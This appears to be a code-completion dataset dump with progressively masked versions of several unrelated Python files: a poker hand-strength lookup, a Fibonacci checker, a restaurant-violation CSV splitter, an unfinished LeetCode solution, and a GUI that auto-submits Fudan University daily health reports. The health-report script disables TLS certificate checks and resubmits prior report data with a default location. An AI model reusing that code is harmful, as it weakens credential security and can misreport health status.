"step-2": "<mask token>\n\n\ndef read_lookup_table(hole_cards, lookup_table):\n \"\"\"\n Reads the preflop lookup table preflop_EHSs.txt.\n Args: \n hole_cards: list of int (deuces cards)\n lookup_table: read from preflop_EHSs.txt\n Return:\n tuple (float, float): EHS, EHS^2\n \"\"\"\n sorted_hole = sorted(hole_cards)\n sorted_hole.reverse()\n card_strings = [Card.int_to_str(card) for card in sorted_hole]\n if card_strings[0][1] != card_strings[1][1]:\n suited = False\n else:\n suited = True\n card_strings[0] = card_strings[0][0] + 'd'\n if suited:\n card_strings[1] = card_strings[1][0] + 'd'\n else:\n card_strings[1] = card_strings[1][0] + 's'\n card_strings = tuple(card_strings)\n return lookup_table[card_strings]\n",
"step-3": "from deuces.card import Card\nfrom deuces.deck import Deck\nfrom fast_utils.hand_strength.original_HS import *\nfrom fast_utils.hand_strength.nn_HS import encode_hs\nfrom fast_utils.expected_hand_strength.nn_EHS import *\nfrom keras.models import load_model\n\n\ndef read_lookup_table(hole_cards, lookup_table):\n \"\"\"\n Reads the preflop lookup table preflop_EHSs.txt.\n Args: \n hole_cards: list of int (deuces cards)\n lookup_table: read from preflop_EHSs.txt\n Return:\n tuple (float, float): EHS, EHS^2\n \"\"\"\n sorted_hole = sorted(hole_cards)\n sorted_hole.reverse()\n card_strings = [Card.int_to_str(card) for card in sorted_hole]\n if card_strings[0][1] != card_strings[1][1]:\n suited = False\n else:\n suited = True\n card_strings[0] = card_strings[0][0] + 'd'\n if suited:\n card_strings[1] = card_strings[1][0] + 'd'\n else:\n card_strings[1] = card_strings[1][0] + 's'\n card_strings = tuple(card_strings)\n return lookup_table[card_strings]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Umut Cakan Computer Science S006742
# Fibonacci list. First and second terms are static.
fib_list = [0, 1]
# Current index.
CURRENT_INDEX = 2
# Function for the checking input is a Fibonacci number or not.
def check_fibonacci_number():
global CURRENT_INDEX
# Get the fibonacci numbers that are less or equal to input value.
# Because we will not need to check fib numbers that are higher than our input.
while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:
fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[CURRENT_INDEX - 2])
CURRENT_INDEX += 1
# Check if the input value is in that list or not.
if NUMBER_TO_BE_CHECKED not in fib_list:
print("Your number is not a Fibonacci number.")
else:
print("Your number is a Fibonacci number.")
# Get number to be checked from user.
while True:
try:
NUMBER_TO_BE_CHECKED = int(input("Please enter the number to check: "))
# If it is not an integer throw an error and wait for another input.
except ValueError:
print("Your input is not an integer!")
continue
# If it is an integer, proceed.
else:
check_fibonacci_number()
break
|
normal
|
{
"blob_id": "50fa8852f74f4d2428fb238a86dd1feedb210877",
"index": 3261,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_fibonacci_number():\n global CURRENT_INDEX\n while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:\n fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[\n CURRENT_INDEX - 2])\n CURRENT_INDEX += 1\n if NUMBER_TO_BE_CHECKED not in fib_list:\n print('Your number is not a Fibonacci number.')\n else:\n print('Your number is a Fibonacci number.')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_fibonacci_number():\n global CURRENT_INDEX\n while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:\n fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[\n CURRENT_INDEX - 2])\n CURRENT_INDEX += 1\n if NUMBER_TO_BE_CHECKED not in fib_list:\n print('Your number is not a Fibonacci number.')\n else:\n print('Your number is a Fibonacci number.')\n\n\nwhile True:\n try:\n NUMBER_TO_BE_CHECKED = int(input('Please enter the number to check: '))\n except ValueError:\n print('Your input is not an integer!')\n continue\n else:\n check_fibonacci_number()\n break\n",
"step-4": "fib_list = [0, 1]\nCURRENT_INDEX = 2\n\n\ndef check_fibonacci_number():\n global CURRENT_INDEX\n while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:\n fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[\n CURRENT_INDEX - 2])\n CURRENT_INDEX += 1\n if NUMBER_TO_BE_CHECKED not in fib_list:\n print('Your number is not a Fibonacci number.')\n else:\n print('Your number is a Fibonacci number.')\n\n\nwhile True:\n try:\n NUMBER_TO_BE_CHECKED = int(input('Please enter the number to check: '))\n except ValueError:\n print('Your input is not an integer!')\n continue\n else:\n check_fibonacci_number()\n break\n",
"step-5": "# Umut Cakan Computer Science S006742\n\n# Fibonacci list. First and second terms are static.\nfib_list = [0, 1]\n# Current index.\nCURRENT_INDEX = 2\n\n# Function for the checking input is a Fibonacci number or not.\ndef check_fibonacci_number():\n global CURRENT_INDEX\n # Get the fibonacci numbers that are less or equal to input value.\n # Because we will not need to check fib numbers that are higher than our input.\n while fib_list[CURRENT_INDEX - 1] < NUMBER_TO_BE_CHECKED:\n fib_list.append(fib_list[CURRENT_INDEX - 1] + fib_list[CURRENT_INDEX - 2])\n CURRENT_INDEX += 1\n # Check if the input value is in that list or not.\n if NUMBER_TO_BE_CHECKED not in fib_list:\n print(\"Your number is not a Fibonacci number.\")\n else:\n print(\"Your number is a Fibonacci number.\")\n\n\n# Get number to be checked from user.\nwhile True:\n try:\n NUMBER_TO_BE_CHECKED = int(input(\"Please enter the number to check: \"))\n # If it is not an integer throw an error and wait for another input.\n except ValueError:\n print(\"Your input is not an integer!\")\n continue\n # If it is an integer, proceed. \n else:\n check_fibonacci_number()\n break\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# ! -*- coding: utf-8 -*-
'''
@Time : 2020/6/4 16:33
@Author : MaohuaYang
@Contact : [email protected]
@File : pinganFudan-GUI.py
@Software: PyCharm
'''
import time
import requests
import tkinter as tk
from login import Ehall
def set_win_center(root, curWidth='', curHight=''):
"""
设置窗口大小,并居中显示
:param root:主窗体实例
:param curWidth:窗口宽度,非必填,默认200
:param curHight:窗口高度,非必填,默认200
:return:无
"""
if not curWidth:
'''获取窗口宽度,默认200'''
curWidth = root.winfo_width()
if not curHight:
'''获取窗口高度,默认200'''
curHight = root.winfo_height()
# print(curWidth, curHight)
# 获取屏幕宽度和高度
scn_w, scn_h = root.maxsize()
# print(scn_w, scn_h)
# 计算中心坐标
cen_x = (scn_w - curWidth) / 2
cen_y = (scn_h - curHight) / 2
# print(cen_x, cen_y)
# 设置窗口初始大小和位置
size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)
root.geometry(size_xy)
def sign_up(ehall, address_info):
url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'
response = ehall.session.get(url, headers=ehall.headers, verify=False)
data = response.json()
url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'
data['d']['info'].update(address_info)
post_data = data['d']['info']
response = ehall.session.post(url, data=post_data, verify=False, headers=ehall.headers)
return response.json()
def main():
root = tk.Tk()
root.title("DailyFudan")
set_win_center(root, 700, 350)
root.resizable(0, 0)
# user ID
lblid = tk.Label(root, text="学号:")
lblid.grid(row=0, column=0)
#lid.pack()
entID = tk.Entry(root)
entID.grid(row=0, column=1, padx=25, pady=0)
#entID.pack()
# password
lblPW = tk.Label(root, text="Ehall密码:")
lblPW.grid(row=1, column=0)
#lPW.pack()
entPW = tk.Entry(root, show="*")
entPW.grid(row=1, column=1)
#entPW.pack()
# location information
lblArea = tk.Label(root, text='区域:')
lblArea.grid(row=2, column=0)
varArea = tk.StringVar(value="上海市 杨浦区")
entArea = tk.Entry(root, textvariable=varArea, width=20)
entArea.grid(row=2, column=1)
#entArea.pack()
lblProv = tk.Label(root, text='省份:')
lblProv.grid(row=3, column=0)
varProv = tk.StringVar(value="上海")
entProv = tk.Entry(root, textvariable=varProv, width=20)
entProv.grid(row=3, column=1)
#entProv.pack()
lblCity = tk.Label(root, text='城市:')
lblCity.grid(row=4, column=0)
varCity = tk.StringVar(value="上海市")
entCity = tk.Entry(root, textvariable=varCity, width=20)
entCity.grid(row=4, column=1)
#entCity.pack()
# auto submit
# to be continue
# log area
scroll = tk.Scrollbar()
textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')
textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S+tk.W+tk.E+tk.N)
scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.N, ipadx=0)
scroll.config(command=textlog.yview)
textlog.config(yscrollcommand=scroll.set)
def submit_btn_cmd():
id = entID.get().strip()
pw = entPW.get().strip()
config = {
'id': id,
'pw': pw
}
ehall = Ehall(config)
ehall.login()
if ehall.username:
address_info = {
"area": varArea.get(),
"province": varProv.get(),
"city": varCity.get()
}
data = sign_up(ehall, address_info)
print(data)
if data['e'] == 0:
log = ">>填报成功!%s %s\n" % (ehall.username, time.ctime())
else:
log = ">>今日已填报!%s %s\n" % (ehall.username, time.ctime())
else:
log = ">>登录失败!%s %s\n" % (ehall.username, time.ctime())
textlog.config(state=tk.NORMAL)
textlog.insert("insert", log)
textlog.config(state=tk.DISABLED)
btuExit = tk.Button(root, text='退出', command=root.quit, width=10)
btuExit.grid(row=5, column=1, pady=2)
btuSub = tk.Button(root, text="提交", command=submit_btn_cmd, width=10)
btuSub.grid(row=5, column=0, pady=2, padx=20)
root.mainloop()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "d133a07f69d2dadb5559d881b01050abb2a9602b",
"index": 3891,
"step-1": "<mask token>\n\n\ndef main():\n root = tk.Tk()\n root.title('DailyFudan')\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n lblid = tk.Label(root, text='学号:')\n lblid.grid(row=0, column=0)\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n lblPW = tk.Label(root, text='Ehall密码:')\n lblPW.grid(row=1, column=0)\n entPW = tk.Entry(root, show='*')\n entPW.grid(row=1, column=1)\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value='上海市 杨浦区')\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value='上海')\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value='上海市')\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n scroll = tk.Scrollbar()\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S + tk.W + tk.E + tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.\n N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {'id': id, 'pw': pw}\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {'area': varArea.get(), 'province': varProv.get(\n ), 'city': varCity.get()}\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = '>>填报成功!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>今日已填报!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>登录失败!%s %s\\n' % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert('insert', log)\n textlog.config(state=tk.DISABLED)\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text='提交', command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n root.mainloop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef set_win_center(root, curWidth='', curHight=''):\n \"\"\"\n 设置窗口大小,并居中显示\n :param root:主窗体实例\n :param curWidth:窗口宽度,非必填,默认200\n :param curHight:窗口高度,非必填,默认200\n :return:无\n \"\"\"\n if not curWidth:\n \"\"\"获取窗口宽度,默认200\"\"\"\n curWidth = root.winfo_width()\n if not curHight:\n \"\"\"获取窗口高度,默认200\"\"\"\n curHight = root.winfo_height()\n scn_w, scn_h = root.maxsize()\n cen_x = (scn_w - curWidth) / 2\n cen_y = (scn_h - curHight) / 2\n size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)\n root.geometry(size_xy)\n\n\ndef sign_up(ehall, address_info):\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'\n response = ehall.session.get(url, headers=ehall.headers, verify=False)\n data = response.json()\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'\n data['d']['info'].update(address_info)\n post_data = data['d']['info']\n response = ehall.session.post(url, data=post_data, verify=False,\n headers=ehall.headers)\n return response.json()\n\n\ndef main():\n root = tk.Tk()\n root.title('DailyFudan')\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n lblid = tk.Label(root, text='学号:')\n lblid.grid(row=0, column=0)\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n lblPW = tk.Label(root, text='Ehall密码:')\n lblPW.grid(row=1, column=0)\n entPW = tk.Entry(root, show='*')\n entPW.grid(row=1, column=1)\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value='上海市 杨浦区')\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value='上海')\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value='上海市')\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n scroll = tk.Scrollbar()\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S + tk.W + tk.E + tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.\n N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {'id': id, 'pw': pw}\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {'area': varArea.get(), 'province': varProv.get(\n ), 'city': varCity.get()}\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = '>>填报成功!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>今日已填报!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>登录失败!%s %s\\n' % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert('insert', log)\n textlog.config(state=tk.DISABLED)\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text='提交', command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n root.mainloop()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef set_win_center(root, curWidth='', curHight=''):\n \"\"\"\n 设置窗口大小,并居中显示\n :param root:主窗体实例\n :param curWidth:窗口宽度,非必填,默认200\n :param curHight:窗口高度,非必填,默认200\n :return:无\n \"\"\"\n if not curWidth:\n \"\"\"获取窗口宽度,默认200\"\"\"\n curWidth = root.winfo_width()\n if not curHight:\n \"\"\"获取窗口高度,默认200\"\"\"\n curHight = root.winfo_height()\n scn_w, scn_h = root.maxsize()\n cen_x = (scn_w - curWidth) / 2\n cen_y = (scn_h - curHight) / 2\n size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)\n root.geometry(size_xy)\n\n\ndef sign_up(ehall, address_info):\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'\n response = ehall.session.get(url, headers=ehall.headers, verify=False)\n data = response.json()\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'\n data['d']['info'].update(address_info)\n post_data = data['d']['info']\n response = ehall.session.post(url, data=post_data, verify=False,\n headers=ehall.headers)\n return response.json()\n\n\ndef main():\n root = tk.Tk()\n root.title('DailyFudan')\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n lblid = tk.Label(root, text='学号:')\n lblid.grid(row=0, column=0)\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n lblPW = tk.Label(root, text='Ehall密码:')\n lblPW.grid(row=1, column=0)\n entPW = tk.Entry(root, show='*')\n entPW.grid(row=1, column=1)\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value='上海市 杨浦区')\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value='上海')\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value='上海市')\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n scroll = tk.Scrollbar()\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S + tk.W + tk.E + tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.\n N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {'id': id, 'pw': pw}\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {'area': varArea.get(), 'province': varProv.get(\n ), 'city': varCity.get()}\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = '>>填报成功!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>今日已填报!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>登录失败!%s %s\\n' % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert('insert', log)\n textlog.config(state=tk.DISABLED)\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text='提交', command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport time\nimport requests\nimport tkinter as tk\nfrom login import Ehall\n\n\ndef set_win_center(root, curWidth='', curHight=''):\n \"\"\"\n 设置窗口大小,并居中显示\n :param root:主窗体实例\n :param curWidth:窗口宽度,非必填,默认200\n :param curHight:窗口高度,非必填,默认200\n :return:无\n \"\"\"\n if not curWidth:\n \"\"\"获取窗口宽度,默认200\"\"\"\n curWidth = root.winfo_width()\n if not curHight:\n \"\"\"获取窗口高度,默认200\"\"\"\n curHight = root.winfo_height()\n scn_w, scn_h = root.maxsize()\n cen_x = (scn_w - curWidth) / 2\n cen_y = (scn_h - curHight) / 2\n size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)\n root.geometry(size_xy)\n\n\ndef sign_up(ehall, address_info):\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'\n response = ehall.session.get(url, headers=ehall.headers, verify=False)\n data = response.json()\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'\n data['d']['info'].update(address_info)\n post_data = data['d']['info']\n response = ehall.session.post(url, data=post_data, verify=False,\n headers=ehall.headers)\n return response.json()\n\n\ndef main():\n root = tk.Tk()\n root.title('DailyFudan')\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n lblid = tk.Label(root, text='学号:')\n lblid.grid(row=0, column=0)\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n lblPW = tk.Label(root, text='Ehall密码:')\n lblPW.grid(row=1, column=0)\n entPW = tk.Entry(root, show='*')\n entPW.grid(row=1, column=1)\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value='上海市 杨浦区')\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value='上海')\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value='上海市')\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n scroll = tk.Scrollbar()\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S + tk.W + tk.E + tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.\n N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {'id': id, 'pw': pw}\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {'area': varArea.get(), 'province': varProv.get(\n ), 'city': varCity.get()}\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = '>>填报成功!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>今日已填报!%s %s\\n' % (ehall.username, time.ctime())\n else:\n log = '>>登录失败!%s %s\\n' % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert('insert', log)\n textlog.config(state=tk.DISABLED)\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text='提交', command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n# ! -*- coding: utf-8 -*-\n'''\n@Time : 2020/6/4 16:33\n@Author : MaohuaYang\n@Contact : [email protected]\n@File : pinganFudan-GUI.py\n@Software: PyCharm\n'''\n\nimport time\nimport requests\nimport tkinter as tk\nfrom login import Ehall\n\ndef set_win_center(root, curWidth='', curHight=''):\n \"\"\"\n 设置窗口大小,并居中显示\n :param root:主窗体实例\n :param curWidth:窗口宽度,非必填,默认200\n :param curHight:窗口高度,非必填,默认200\n :return:无\n \"\"\"\n if not curWidth:\n '''获取窗口宽度,默认200'''\n curWidth = root.winfo_width()\n if not curHight:\n '''获取窗口高度,默认200'''\n curHight = root.winfo_height()\n # print(curWidth, curHight)\n\n # 获取屏幕宽度和高度\n scn_w, scn_h = root.maxsize()\n # print(scn_w, scn_h)\n\n # 计算中心坐标\n cen_x = (scn_w - curWidth) / 2\n cen_y = (scn_h - curHight) / 2\n # print(cen_x, cen_y)\n\n # 设置窗口初始大小和位置\n size_xy = '%dx%d+%d+%d' % (curWidth, curHight, cen_x, cen_y)\n root.geometry(size_xy)\n\ndef sign_up(ehall, address_info):\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/get-info'\n response = ehall.session.get(url, headers=ehall.headers, verify=False)\n data = response.json()\n\n url = 'https://zlapp.fudan.edu.cn/ncov/wap/fudan/save'\n data['d']['info'].update(address_info)\n post_data = data['d']['info']\n response = ehall.session.post(url, data=post_data, verify=False, headers=ehall.headers)\n\n return response.json()\n\n\ndef main():\n root = tk.Tk()\n root.title(\"DailyFudan\")\n set_win_center(root, 700, 350)\n root.resizable(0, 0)\n\n # user ID\n lblid = tk.Label(root, text=\"学号:\")\n lblid.grid(row=0, column=0)\n #lid.pack()\n\n entID = tk.Entry(root)\n entID.grid(row=0, column=1, padx=25, pady=0)\n #entID.pack()\n # password\n lblPW = tk.Label(root, text=\"Ehall密码:\")\n lblPW.grid(row=1, column=0)\n #lPW.pack()\n entPW = tk.Entry(root, show=\"*\")\n entPW.grid(row=1, column=1)\n #entPW.pack()\n\n # location information\n lblArea = tk.Label(root, text='区域:')\n lblArea.grid(row=2, column=0)\n varArea = tk.StringVar(value=\"上海市 杨浦区\")\n entArea = tk.Entry(root, textvariable=varArea, width=20)\n entArea.grid(row=2, column=1)\n #entArea.pack()\n lblProv = tk.Label(root, text='省份:')\n lblProv.grid(row=3, column=0)\n varProv = tk.StringVar(value=\"上海\")\n entProv = tk.Entry(root, textvariable=varProv, width=20)\n entProv.grid(row=3, column=1)\n #entProv.pack()\n lblCity = tk.Label(root, text='城市:')\n lblCity.grid(row=4, column=0)\n varCity = tk.StringVar(value=\"上海市\")\n entCity = tk.Entry(root, textvariable=varCity, width=20)\n entCity.grid(row=4, column=1)\n #entCity.pack()\n\n # auto submit\n # to be continue\n\n # log area\n scroll = tk.Scrollbar()\n\n textlog = tk.Text(root, state=tk.DISABLED, width=50, bg='lightgray')\n textlog.grid(row=0, rowspan=6, column=2, sticky=tk.S+tk.W+tk.E+tk.N)\n scroll.grid(row=0, rowspan=6, column=3, sticky=tk.S + tk.W + tk.E + tk.N, ipadx=0)\n scroll.config(command=textlog.yview)\n textlog.config(yscrollcommand=scroll.set)\n\n def submit_btn_cmd():\n id = entID.get().strip()\n pw = entPW.get().strip()\n config = {\n 'id': id,\n 'pw': pw\n }\n ehall = Ehall(config)\n ehall.login()\n if ehall.username:\n address_info = {\n \"area\": varArea.get(),\n \"province\": varProv.get(),\n \"city\": varCity.get()\n }\n data = sign_up(ehall, address_info)\n print(data)\n if data['e'] == 0:\n log = \">>填报成功!%s %s\\n\" % (ehall.username, time.ctime())\n else:\n log = \">>今日已填报!%s %s\\n\" % (ehall.username, time.ctime())\n else:\n log = \">>登录失败!%s %s\\n\" % (ehall.username, time.ctime())\n textlog.config(state=tk.NORMAL)\n textlog.insert(\"insert\", log)\n textlog.config(state=tk.DISABLED)\n\n btuExit = tk.Button(root, text='退出', command=root.quit, width=10)\n btuExit.grid(row=5, column=1, pady=2)\n btuSub = tk.Button(root, text=\"提交\", command=submit_btn_cmd, width=10)\n btuSub.grid(row=5, column=0, pady=2, padx=20)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import csv
with open('healthviolations.csv', 'w') as fp:
with open('Restaurant_Inspections.csv', 'rb') as csvfile:
reader = csv.reader(csvfile)
header = next(reader, None)
writer = csv.writer(fp, delimiter=',')
writer.writerow([header[0], "violation"])
for row in reader:
if (row[20] != '') :
violationarr = row[20].split(",")
for violation in violationarr :
writer.writerow([row[0], violation])
# writer.writerow([header[0], header[1], "violation"])
# writer.writerow([row[0], row[1], violation])
|
normal
|
{
"blob_id": "1825b365032a224ed56a1814d7f6457e2add8fdd",
"index": 8008,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('healthviolations.csv', 'w') as fp:\n with open('Restaurant_Inspections.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n header = next(reader, None)\n writer = csv.writer(fp, delimiter=',')\n writer.writerow([header[0], 'violation'])\n for row in reader:\n if row[20] != '':\n violationarr = row[20].split(',')\n for violation in violationarr:\n writer.writerow([row[0], violation])\n",
"step-3": "import csv\nwith open('healthviolations.csv', 'w') as fp:\n with open('Restaurant_Inspections.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n header = next(reader, None)\n writer = csv.writer(fp, delimiter=',')\n writer.writerow([header[0], 'violation'])\n for row in reader:\n if row[20] != '':\n violationarr = row[20].split(',')\n for violation in violationarr:\n writer.writerow([row[0], violation])\n",
"step-4": "import csv\n\nwith open('healthviolations.csv', 'w') as fp:\n\n with open('Restaurant_Inspections.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n header = next(reader, None)\n writer = csv.writer(fp, delimiter=',')\n writer.writerow([header[0], \"violation\"])\n for row in reader:\n if (row[20] != '') :\n violationarr = row[20].split(\",\")\n for violation in violationarr :\n writer.writerow([row[0], violation])\n\n\n# writer.writerow([header[0], header[1], \"violation\"])\n# writer.writerow([row[0], row[1], violation])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# LCP 74. 最强祝福力场-离散化+二维差分
# https://leetcode.cn/problems/xepqZ5/
# forceField[i] = [x,y,side] 表示第 i 片力场将覆盖以坐标 (x,y) 为中心,边长为 side 的正方形区域。
# !若任意一点的 力场强度 等于覆盖该点的力场数量,请求出在这片地带中 力场强度 最强处的 力场强度。
# !统计所有左下和右上坐标,由于会出现 0.5可以将坐标乘 2。
# O(n^2)
from typing import List
from 二维差分模板 import DiffMatrix
class Solution:
def fieldOfGreatestBlessing(self, forceField: List[List[int]]) -> int:
# 离散化
allX, allY = set(), set()
for x, y, side in forceField:
allX.add(2 * x - side)
allX.add(2 * x + side)
allY.add(2 * y - side)
allY.add(2 * y + side)
sortedX = sorted(allX)
sortedY = sorted(allY)
rankX = {x: i for i, x in enumerate(sortedX)}
rankY = {y: i for i, y in enumerate(sortedY)}
# 二维差分
row, col = len(sortedX), len(sortedY)
diffMatrix = DiffMatrix([[0] * col for _ in range(row)])
